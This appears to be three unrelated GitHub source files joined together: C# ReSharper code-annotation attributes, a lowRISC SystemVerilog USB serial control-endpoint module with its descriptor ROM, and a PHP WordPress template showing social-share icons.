</list> /// </example> [AttributeUsage(AttributeTargets.Method, AllowMultiple = false, Inherited = true)] public sealed class NotifyPropertyChangedInvocatorAttribute : Attribute { public NotifyPropertyChangedInvocatorAttribute() { } public NotifyPropertyChangedInvocatorAttribute(string parameterName) { ParameterName = parameterName; } public string ParameterName { get; private set; } } /// <summary> /// Describes dependency between method input and output /// </summary> /// <syntax> /// <p>Function Definition Table syntax:</p> /// <list> /// <item>FDT ::= FDTRow [;FDTRow]*</item> /// <item>FDTRow ::= Input =&gt; Output | Output &lt;= Input</item> /// <item>Input ::= ParameterName: Value [, Input]*</item> /// <item>Output ::= [ParameterName: Value]* {halt|stop|void|nothing|Value}</item> /// <item>Value ::= true | false | null | notnull | canbenull</item> /// </list> /// If method has single input parameter, it's name could be omitted.<br/> /// Using <c>halt</c> (or <c>void</c>/<c>nothing</c>, which is the same) /// for method output means that the methos doesn't return normally.<br/> /// <c>canbenull</c> annotation is only applicable for output parameters.<br/> /// You can use multiple <c>[ContractAnnotation]</c> for each FDT row, /// or use single attribute with rows separated by semicolon.<br/> /// </syntax> /// <examples><list> /// <item><code> /// [ContractAnnotation("=> halt")] /// public void TerminationMethod() /// </code></item> /// <item><code> /// [ContractAnnotation("halt &lt;= condition: false")] /// public void Assert(bool condition, string text) // regular assertion method /// </code></item> /// <item><code> /// [ContractAnnotation("s:null => true")] /// public bool IsNullOrEmpty(string s) // string.IsNullOrEmpty() /// </code></item> /// <item><code> /// // A method that returns null if the parameter is null, and not null if the parameter is not null /// [ContractAnnotation("null => null; notnull => notnull")] /// public object Transform(object data) /// </code></item> /// <item><code> /// [ContractAnnotation("s:null=>false; =>true,result:notnull; =>false, result:null")] /// public bool TryParse(string s, out Person result) /// </code></item> /// </list></examples> [AttributeUsage(AttributeTargets.Method, AllowMultiple = true, Inherited = true)] public sealed class ContractAnnotationAttribute : Attribute { public ContractAnnotationAttribute([NotNull] string contract) : this(contract, false) { } public ContractAnnotationAttribute([NotNull] string contract, bool forceFullStates) { Contract = contract; ForceFullStates = forceFullStates; } public string Contract { get; private set; } public bool ForceFullStates { get; private set; } } /// <summary> /// Indicates that marked element should be localized or not /// </summary> /// <example><code> /// [LocalizationRequiredAttribute(true)] /// public class Foo { /// private string str = "my string"; // Warning: Localizable string /// } /// </code></example> [AttributeUsage(AttributeTargets.All, AllowMultiple = false, Inherited = true)] public sealed class LocalizationRequiredAttribute : Attribute { public LocalizationRequiredAttribute() : this(true) { } public LocalizationRequiredAttribute(bool required) { Required = required; } public bool Required { get; private set; } } /// <summary> /// Indicates that the value of the marked type (or its derivatives) /// cannot be compared using '==' or '!=' operators and <c>Equals()</c> /// should be used instead. However, using '==' or '!=' for comparison /// with <c>null</c> is always permitted. /// </summary> /// <example><code> /// [CannotApplyEqualityOperator] /// class NoEquality { } /// class UsesNoEquality { /// public void Test() { /// var ca1 = new NoEquality(); /// var ca2 = new NoEquality(); /// if (ca1 != null) { // OK /// bool condition = ca1 == ca2; // Warning /// } /// } /// } /// </code></example> [AttributeUsage( AttributeTargets.Interface | AttributeTargets.Class | AttributeTargets.Struct, AllowMultiple = false, Inherited = true)] public sealed class CannotApplyEqualityOperatorAttribute : Attribute { } /// <summary> /// When applied to a target attribute, specifies a requirement for any type marked /// with the target attribute to implement or inherit specific type or types. /// </summary> /// <example><code> /// [BaseTypeRequired(typeof(IComponent)] // Specify requirement /// public class ComponentAttribute : Attribute { } /// [Component] // ComponentAttribute requires implementing IComponent interface /// public class MyComponent : IComponent { } /// </code></example> [AttributeUsage(AttributeTargets.Class, AllowMultiple = true, Inherited = true)] [BaseTypeRequired(typeof(Attribute))] public sealed class BaseTypeRequiredAttribute : Attribute { public BaseTypeRequiredAttribute([NotNull] Type baseType) { BaseType = baseType; } [NotNull] public Type BaseType { get; private set; } } /// <summary> /// Indicates that the marked symbol is used implicitly /// (e.g. via reflection, in external library), so this symbol /// will not be marked as unused (as well as by other usage inspections) /// </summary> [AttributeUsage(AttributeTargets.All, AllowMultiple = false, Inherited = true)] public sealed class UsedImplicitlyAttribute : Attribute { public UsedImplicitlyAttribute() : this(ImplicitUseKindFlags.Default, ImplicitUseTargetFlags.Default) { } public UsedImplicitlyAttribute(ImplicitUseKindFlags useKindFlags) : this(useKindFlags, ImplicitUseTargetFlags.Default) { } public UsedImplicitlyAttribute(ImplicitUseTargetFlags targetFlags) : this(ImplicitUseKindFlags.Default, targetFlags) { } public UsedImplicitlyAttribute( ImplicitUseKindFlags useKindFlags, ImplicitUseTargetFlags targetFlags) { UseKindFlags = useKindFlags; TargetFlags = targetFlags; } public ImplicitUseKindFlags UseKindFlags { get; private set; } public ImplicitUseTargetFlags TargetFlags { get; private set; } } /// <summary> /// Should be used on attributes and causes ReSharper /// to not mark symbols marked with such attributes as unused /// (as well as by other usage inspections) /// </summary> [AttributeUsage(AttributeTargets.Class, AllowMultiple = false, Inherited = true)] public sealed class MeansImplicitUseAttribute : Attribute { public MeansImplicitUseAttribute() : this(ImplicitUseKindFlags.Default, ImplicitUseTargetFlags.Default) { } public MeansImplicitUseAttribute(ImplicitUseKindFlags useKindFlags) : this(useKindFlags, ImplicitUseTargetFlags.Default) { } public MeansImplicitUseAttribute(ImplicitUseTargetFlags targetFlags) : this(ImplicitUseKindFlags.Default, targetFlags) { } public MeansImplicitUseAttribute( ImplicitUseKindFlags useKindFlags, ImplicitUseTargetFlags targetFlags) { UseKindFlags = useKindFlags; TargetFlags = targetFlags; } [UsedImplicitly] public ImplicitUseKindFlags UseKindFlags { get; private set; } [UsedImplicitly] public ImplicitUseTargetFlags TargetFlags { get; private set; } } [Flags] public enum ImplicitUseKindFlags { Default = Access | Assign | InstantiatedWithFixedConstructorSignature, /// <summary>Only entity marked with attribute considered used</summary> Access = 1, /// <summary>Indicates implicit assignment to a member</summary> Assign = 2, /// <summary> /// Indicates implicit instantiation of a type with fixed constructor signature. /// That means any unused constructor parameters won't be reported as such. /// </summary> InstantiatedWithFixedConstructorSignature = 4, /// <summary>Indicates implicit instantiation of a type</summary> InstantiatedNoFixedConstructorSignature = 8, } /// <summary> /// Specify what is considered used implicitly /// when marked with <see cref="MeansImplicitUseAttribute"/> /// or <see cref="UsedImplicitlyAttribute"/> /// </summary> [Flags] public enum ImplicitUseTargetFlags { Default = Itself, Itself = 1, /// <summary>Members of entity marked with attribute are considered used</summary> Members = 2, /// <summary>Entity marked with attribute and all its members considered used</summary> WithMembers = Itself | Members } /// <summary> /// This attribute is intended to mark publicly available API /// which should not be removed and so is treated as used /// </summary> [MeansImplicitUse] public sealed class PublicAPIAttribute : Attribute { public PublicAPIAttribute() { } public PublicAPIAttribute([NotNull] string comment) { Comment = comment; } [NotNull] public string Comment { get; private set; } } /// <summary> /// Tells code analysis engine if the parameter is completely handled /// when the invoked method is on stack. If the parameter is a delegate, /// indicates that delegate is executed while the method is executed. /// If the parameter is an enumerable, indicates that it is enumerated /// while the method is executed /// </summary> [AttributeUsage(AttributeTargets.Parameter, Inherited = true)] public sealed class InstantHandleAttribute : Attribute { } /// <summary> /// Indicates that a method does not make any observable state changes. /// The same as <c>System.Diagnostics.Contracts.PureAttribute</c> /// </summary> /// <example><code> /// [Pure] private int Multiply(int x, int y) { return x * y; } /// public void Foo() { /// const int a = 2, b = 2; /// Multiply(a, b); // Waring: Return value of pure method is not used /// } /// </code></example> [AttributeUsage(AttributeTargets.Method, Inherited = true)] public sealed class PureAttribute : Attribute { } /// <summary> /// Indicates that a parameter is a path to a file or a folder /// within a web project. Path can be relative or absolute, /// starting from web root (~) /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public class PathReferenceAttribute : Attribute { public PathReferenceAttribute() { } public PathReferenceAttribute([PathReference] string basePath) { BasePath = basePath; } [NotNull] public string BasePath { get; private set; } } // ASP.NET MVC attributes [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaMasterLocationFormatAttribute : Attribute { public AspMvcAreaMasterLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaPartialViewLocationFormatAttribute : Attribute { public AspMvcAreaPartialViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcAreaViewLocationFormatAttribute : Attribute { public AspMvcAreaViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcMasterLocationFormatAttribute : Attribute { public AspMvcMasterLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcPartialViewLocationFormatAttribute : Attribute { public AspMvcPartialViewLocationFormatAttribute(string format) { } } [AttributeUsage(AttributeTargets.Assembly, AllowMultiple = true)] public sealed class AspMvcViewLocationFormatAttribute : Attribute { public AspMvcViewLocationFormatAttribute(string format) { } } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that the parameter /// is an MVC action. If applied to a method, the MVC action name is calculated /// implicitly from the context. Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcActionAttribute : Attribute { public AspMvcActionAttribute() { } public AspMvcActionAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC area. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcAreaAttribute : PathReferenceAttribute { public AspMvcAreaAttribute() { } public AspMvcAreaAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that /// the parameter is an MVC controller. If applied to a method, /// the MVC controller name is calculated implicitly from the context. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.ChildActionExtensions.RenderAction(HtmlHelper, String, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcControllerAttribute : Attribute { public AspMvcControllerAttribute() { } public AspMvcControllerAttribute([NotNull] string anonymousProperty) { AnonymousProperty = anonymousProperty; } [NotNull] public string AnonymousProperty { get; private set; } } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC Master. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(String, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcMasterAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC model type. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(String, Object)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcModelTypeAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that /// the parameter is an MVC partial view. If applied to a method, /// the MVC partial view name is calculated implicitly from the context. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.RenderPartialExtensions.RenderPartial(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcPartialViewAttribute : PathReferenceAttribute { } /// <summary> /// ASP.NET MVC attribute. Allows disabling all inspections /// for MVC views within a class or a method. /// </summary> [AttributeUsage(AttributeTargets.Class | AttributeTargets.Method)] public sealed class AspMvcSupressViewErrorAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC display template. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.DisplayExtensions.DisplayForModel(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcDisplayTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC editor template. /// Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Html.EditorExtensions.EditorForModel(HtmlHelper, String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcEditorTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. Indicates that a parameter is an MVC template. /// Use this attribute for custom wrappers similar to /// <c>System.ComponentModel.DataAnnotations.UIHintAttribute(System.String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter)] public sealed class AspMvcTemplateAttribute : Attribute { } /// <summary> /// ASP.NET MVC attribute. If applied to a parameter, indicates that the parameter /// is an MVC view. If applied to a method, the MVC view name is calculated implicitly /// from the context. Use this attribute for custom wrappers similar to /// <c>System.Web.Mvc.Controller.View(Object)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method)] public sealed class AspMvcViewAttribute : PathReferenceAttribute { } /// <summary> /// ASP.NET MVC attribute. When applied to a parameter of an attribute, /// indicates that this parameter is an MVC action name /// </summary> /// <example><code> /// [ActionName("Foo")] /// public ActionResult Login(string returnUrl) { /// ViewBag.ReturnUrl = Url.Action("Foo"); // OK /// return RedirectToAction("Bar"); // Error: Cannot resolve action /// } /// </code></example> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Property)] public sealed class AspMvcActionSelectorAttribute : Attribute { } [AttributeUsage( AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Field, Inherited = true)] public sealed class HtmlElementAttributesAttribute : Attribute { public HtmlElementAttributesAttribute() { } public HtmlElementAttributesAttribute([NotNull] string name) { Name = name; } [NotNull] public string Name { get; private set; } } [AttributeUsage( AttributeTargets.Parameter | AttributeTargets.Field | AttributeTargets.Property, Inherited = true)] public sealed class HtmlAttributeValueAttribute : Attribute { public HtmlAttributeValueAttribute([NotNull] string name) { Name = name; } [NotNull] public string Name { get; private set; } } // Razor attributes /// <summary> /// Razor attribute. Indicates that a parameter or a method is a Razor section. /// Use this attribute for custom wrappers similar to /// <c>System.Web.WebPages.WebPageBase.RenderSection(String)</c> /// </summary> [AttributeUsage(AttributeTargets.Parameter | AttributeTargets.Method, Inherited = true)] public sealed class RazorSectionAttribute : Attribute { } }
{ "pile_set_name": "Github" }
// Copyright lowRISC contributors. // Copyright Luke Valenty (TinyFPGA project) // Licensed under the Apache License, Version 2.0, see LICENSE for details. // SPDX-License-Identifier: Apache-2.0 // // Converted from common/usb_serial_ctrl_ep.v // -- move from CDC to Google simple serial protocol // -- conform to lowRISC coding style module usb_serial_ctrl_ep #( parameter int unsigned MaxPktSizeByte = 32, // Derived parameters localparam int unsigned PktW = $clog2(MaxPktSizeByte) ) ( input clk_i, input rst_ni, output logic [6:0] dev_addr, //////////////////////////// // out endpoint interface // //////////////////////////// input out_ep_data_put_i, input [PktW - 1:0] out_ep_put_addr_i, input [7:0] out_ep_data_i, input out_ep_acked_i, input out_ep_rollback_i, input out_ep_setup_i, output logic out_ep_full_o, output logic out_ep_stall_o, /////////////////////////// // in endpoint interface // /////////////////////////// input in_ep_rollback_i, input in_ep_acked_i, input [PktW - 1:0] in_ep_get_addr_i, input in_ep_data_get_i, output logic in_ep_stall_o, output logic in_ep_has_data_o, output logic [7:0] in_ep_data_o, output logic in_ep_data_done_o ); // suppress errors logic unused_1; logic [PktW-1:0] unused_2; assign unused_1 = in_ep_rollback_i; assign unused_2 = in_ep_get_addr_i; import usb_consts_pkg::*; // State machine for control transfers typedef enum logic [2:0] { StIdle = 3'h0, StSetup = 3'h1, StDataIn = 3'h2, StDataOut = 3'h3, StStatusIn = 3'h4, StStatusOut = 3'h5 } state_ctrl_xfr_e; state_ctrl_xfr_e ctrl_xfr_state; state_ctrl_xfr_e ctrl_xfr_state_next; logic setup_stage_end; logic status_stage_end; logic send_zero_length_data_pkt; // the default control endpoint gets assigned the device address logic [6:0] dev_addr_int; logic [6:0] new_dev_addr; assign dev_addr = dev_addr_int; assign out_ep_stall_o = 1'b0; assign out_ep_full_o = 1'b0; // keep track of new out data start and end logic pkt_start; logic pkt_end; assign pkt_start = (out_ep_put_addr_i == 0) && out_ep_data_put_i; assign pkt_end = out_ep_acked_i || out_ep_rollback_i; // need to record the 8 bytes of setup data logic [7:0] bmRequestType, raw_setup_data [8]; // Alias for the setup bytes using names from USB spec usb_setup_request_e bRequest; logic [15:0] wValue, wLength, wIndex; logic setup_pkt_start, has_data_stage, out_data_stage, in_data_stage; assign setup_pkt_start = pkt_start && out_ep_setup_i; assign has_data_stage = wLength != 16'h0; assign out_data_stage = has_data_stage && !bmRequestType[7]; assign in_data_stage = has_data_stage && bmRequestType[7]; logic [7:0] bytes_sent; logic [6:0] rom_length; logic all_data_sent, more_data_to_send, in_data_transfer_done; // if any upper bits in wLength are set the rom_length will trigger first // here any request for >127 will generate a check based on >128 assign all_data_sent = (bytes_sent >= {1'b0, rom_length}) || (bytes_sent >= {|wLength[15:7], wLength[6:0]}); assign more_data_to_send = !all_data_sent; rising_edge_detector detect_in_data_transfer_done ( .clk_i (clk_i), .rst_ni(rst_ni), .in_i (all_data_sent), .out_o (in_data_transfer_done) ); assign in_ep_has_data_o = more_data_to_send || send_zero_length_data_pkt; assign in_ep_data_done_o = (in_data_transfer_done && (ctrl_xfr_state == StDataIn)) || send_zero_length_data_pkt; logic [6:0] rom_addr; logic save_dev_addr; //////////////////////////////////// // control transfer state machine // //////////////////////////////////// always_comb begin setup_stage_end = 1'b0; status_stage_end = 1'b0; send_zero_length_data_pkt = 1'b0; unique case (ctrl_xfr_state) StIdle: begin if (setup_pkt_start) begin ctrl_xfr_state_next = StSetup; end else begin ctrl_xfr_state_next = StIdle; end end StSetup: begin if (pkt_end) begin // rollback here is most likely a CRC error on the SETUP packet if (out_ep_rollback_i) begin ctrl_xfr_state_next = StIdle; end else if (in_data_stage) begin ctrl_xfr_state_next = StDataIn; setup_stage_end = 1'b1; end else if (out_data_stage) begin ctrl_xfr_state_next = StDataOut; setup_stage_end = 1'b1; end else begin ctrl_xfr_state_next = StStatusIn; send_zero_length_data_pkt = 1'b1; setup_stage_end = 1'b1; end end else begin ctrl_xfr_state_next = StSetup; end end StDataIn: begin if (in_ep_stall_o) begin ctrl_xfr_state_next = StIdle; status_stage_end = 1'b1; end else if (in_ep_acked_i && all_data_sent) begin ctrl_xfr_state_next = StStatusOut; end else begin ctrl_xfr_state_next = StDataIn; end end StDataOut: begin if (out_ep_acked_i) begin ctrl_xfr_state_next = StStatusIn; send_zero_length_data_pkt = 1'b1; end else begin ctrl_xfr_state_next = StDataOut; end end StStatusIn: begin if (in_ep_acked_i) begin ctrl_xfr_state_next = StIdle; status_stage_end = 1'b1; end else begin ctrl_xfr_state_next = StStatusIn; send_zero_length_data_pkt = 1'b1; end end StStatusOut: begin if (out_ep_acked_i) begin ctrl_xfr_state_next = StIdle; status_stage_end = 1'b1; end else begin ctrl_xfr_state_next = StStatusOut; end end default begin ctrl_xfr_state_next = StIdle; end endcase end always_ff @(posedge clk_i or negedge rst_ni) begin if (!rst_ni) begin ctrl_xfr_state <= StIdle; end else begin ctrl_xfr_state <= ctrl_xfr_state_next; end end assign bmRequestType = raw_setup_data[0]; assign bRequest = usb_setup_request_e'(raw_setup_data[1]); assign wValue = {raw_setup_data[3][7:0], raw_setup_data[2][7:0]}; assign wIndex = {raw_setup_data[5][7:0], raw_setup_data[4][7:0]}; assign wLength = {raw_setup_data[7][7:0], raw_setup_data[6][7:0]}; // suppress warning logic [6:0] unused_bmR; logic unused_wValue; logic [15:0] unused_wIndex; assign unused_bmR = bmRequestType[6:0]; assign unused_wValue = wValue[7]; assign unused_wIndex = wIndex; // Check of upper put_addr bits needed because CRC will be sent (10 bytes total) always_ff @(posedge clk_i) begin if (out_ep_setup_i && out_ep_data_put_i && (out_ep_put_addr_i[PktW - 1:3] == '0)) begin raw_setup_data[out_ep_put_addr_i[2:0]] <= out_ep_data_i; end end // Send setup data (which will be empty in case of a SET operation and // come from the ROM in the case of a GET) usb_dscr_type_e dscr_type; assign dscr_type = usb_dscr_type_e'(wValue[15:8]); always_ff @(posedge clk_i or negedge rst_ni) begin if (!rst_ni) begin dev_addr_int <= '0; save_dev_addr <= 1'b0; in_ep_stall_o <= 1'b0; end else begin if (setup_stage_end) begin bytes_sent <= '0; // Command (bRequest) and sub-command (wValue) come from USB spec unique case (bRequest) SetupGetDescriptor: begin unique case (dscr_type) DscrTypeDevice: begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h00; rom_length <= 7'h12; end DscrTypeConfiguration: begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h12; rom_length <= 7'h20; // 9+9+7+7 end DscrTypeDevQual: begin in_ep_stall_o <= 1'b1; rom_addr <= 7'h00; rom_length <= 7'h00; end default begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h00; rom_length <= 7'h00; end endcase end SetupSetAddress: begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h00; rom_length <= 7'h00; // we need to save the address after the status stage ends // this is because the status stage token will still be using // the old device address save_dev_addr <= 1'b1; new_dev_addr <= wValue[6:0]; end SetupSetConfiguration: begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h00; rom_length <= 7'h00; end default begin in_ep_stall_o <= 1'b0; rom_addr <= 7'h00; rom_length <= 7'h00; end endcase end else if ((ctrl_xfr_state == StDataIn) && more_data_to_send && in_ep_data_get_i) begin rom_addr <= rom_addr + 7'h1; bytes_sent <= bytes_sent + 8'h1; end else if (status_stage_end) begin bytes_sent <= '0; rom_addr <= '0; rom_length <= '0; if (save_dev_addr) begin save_dev_addr <= 1'b0; dev_addr_int <= new_dev_addr; end end end end always_comb begin unique case (rom_addr) // device descriptor 'h000: in_ep_data_o = 8'd18; // bLength 'h001: in_ep_data_o = {DscrTypeDevice}; // bDescriptorType 'h002: in_ep_data_o = 8'h00; // bcdUSB[0] 'h003: in_ep_data_o = 8'h02; // bcdUSB[1] 'h004: in_ep_data_o = 8'h00; // bDeviceClass (defined at interface level) 'h005: in_ep_data_o = 8'h00; // bDeviceSubClass 'h006: in_ep_data_o = 8'h00; // bDeviceProtocol 'h007: in_ep_data_o = 8'd32; // bMaxPacketSize0 'h008: in_ep_data_o = 8'hd1; // idVendor[0] 0x18d1 Google Inc. 'h009: in_ep_data_o = 8'h18; // idVendor[1] 'h00A: in_ep_data_o = 8'h39; // idProduct[0] Simple Serial USB IP 'h00B: in_ep_data_o = 8'h50; // idProduct[1] (Allocated in Chrome OS block for this IP) 'h00C: in_ep_data_o = 8'h0; // bcdDevice[0] 'h00D: in_ep_data_o = 8'h1; // bcdDevice[1] 'h00E: in_ep_data_o = 8'h0; // iManufacturer 'h00F: in_ep_data_o = 8'h0; // iProduct 'h010: in_ep_data_o = 8'h0; // iSerialNumber 'h011: in_ep_data_o = 8'h1; // bNumConfigurations // configuration descriptor 'h012: in_ep_data_o = 8'd9; // bLength 'h013: in_ep_data_o = {DscrTypeConfiguration}; // bDescriptorType 'h014: in_ep_data_o = 8'(9+9+7+7); // wTotalLength[0] 'h015: in_ep_data_o = 8'h0; // wTotalLength[1] 'h016: in_ep_data_o = 8'h1; // bNumInterfaces 'h017: in_ep_data_o = 8'h1; // bConfigurationValue 'h018: in_ep_data_o = 8'h0; // iConfiguration 'h019: in_ep_data_o = 8'hC0; // bmAttributes: must-be-one, self-powered 'h01A: in_ep_data_o = 8'd50; // bMaxPower // interface descriptor, USB spec 9.6.5, page 267-269, Table 9-12 'h01B: in_ep_data_o = 8'd9; // bLength 'h01C: in_ep_data_o = {DscrTypeInterface}; // bDescriptorType 'h01D: in_ep_data_o = 8'h0; // bInterfaceNumber 'h01E: in_ep_data_o = 8'h0; // bAlternateSetting 'h01F: in_ep_data_o = 8'h2; // bNumEndpoints (must follow below) 'h020: in_ep_data_o = 8'hff; // bInterfaceClass (Vendor Specific Class) 'h021: in_ep_data_o = 8'h50; // bInterfaceSubClass (Simple serial) 'h022: in_ep_data_o = 8'h1; // bInterfaceProtocol (standard) 'h023: in_ep_data_o = 8'h0; // iInterface // endpoint descriptor, USB spec 9.6.6, page 269-271, Table 9-13 'h024: in_ep_data_o = 8'd7; // bLength 'h025: in_ep_data_o = {DscrTypeEndpoint}; // bDescriptorType 'h026: in_ep_data_o = 8'h1; // bEndpointAddress, OUT 'h027: in_ep_data_o = 8'h02; // bmAttributes (0x02=bulk, data) 'h028: in_ep_data_o = 8'd32; // wMaxPacketSize[0] 'h029: in_ep_data_o = 8'h0; // wMaxPacketSize[1] 'h02A: in_ep_data_o = 8'h0; // bInterval // endpoint descriptor, USB spec 9.6.6, page 269-271, Table 9-13 'h02B: in_ep_data_o = 8'd7; // bLength 'h02C: in_ep_data_o = {DscrTypeEndpoint}; // bDescriptorType 'h02D: in_ep_data_o = 8'h81; // bEndpointAddress, IN 'h02E: in_ep_data_o = 8'h02; // bmAttributes (0x02=bulk, data) 'h02F: in_ep_data_o = 8'd32; // wMaxPacketSize[0] 'h030: in_ep_data_o = 8'h0; // wMaxPacketSize[1] 'h031: in_ep_data_o = 8'h4; // bInterval (4 vs 10 in twinkie) default begin in_ep_data_o = 0; end endcase end endmodule
{ "pile_set_name": "Github" }
<?php /** * Display social sharing icons. * * @package _s */ ?> <div class="social-share"> <h5 class="social-share-title"><?php esc_html_e( 'Share This', '_s' ); ?></h5> <ul class="social-icons menu menu-horizontal"> <li class="social-icon"> <a href="<?php echo esc_url( _s_get_twitter_share_url() ); ?>" onclick="window.open(this.href, 'targetWindow', 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=600, height=300' ); return false;"> <?php _s_display_svg( array( 'icon' => 'twitter-square', 'title' => __( 'Twitter', '_s' ), 'desc' => esc_html__( 'Share on Twitter', '_s' ), ) ); ?> <span class="screen-reader-text"><?php esc_html_e( 'Share on Twitter', '_s' ); ?></span> </a> </li> <li class="social-icon"> <a href="<?php echo esc_url( _s_get_facebook_share_url() ); ?>" onclick="window.open(this.href, 'targetWindow', 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=600, height=300' ); return false;"> <?php _s_display_svg( array( 'icon' => 'facebook-square', 'title' => __( 'Facebook', '_s' ), 'desc' => esc_html__( 'Share on Facebook', '_s' ), ) ); ?> <span class="screen-reader-text"><?php esc_html_e( 'Share on Facebook', '_s' ); ?></span> </a> </li> <li class="social-icon"> <a href="<?php echo esc_url( _s_get_linkedin_share_url() ); ?>" onclick="window.open(this.href, 'targetWindow', 'toolbar=no, location=no, status=no, menubar=no, scrollbars=yes, resizable=yes, top=150, left=0, width=475, height=505' ); return false;"> <?php _s_display_svg( array( 'icon' => 'linkedin-square', 'title' => __( 'LinkedIn', '_s' ), 'desc' => esc_html__( 'Share on LinkedIn', '_s' ), ) ); ?> <span class="screen-reader-text"><?php esc_html_e( 'Share on LinkedIn', '_s' ); ?></span> </a> </li> </ul> </div><!-- .social-share -->
{ "pile_set_name": "Github" }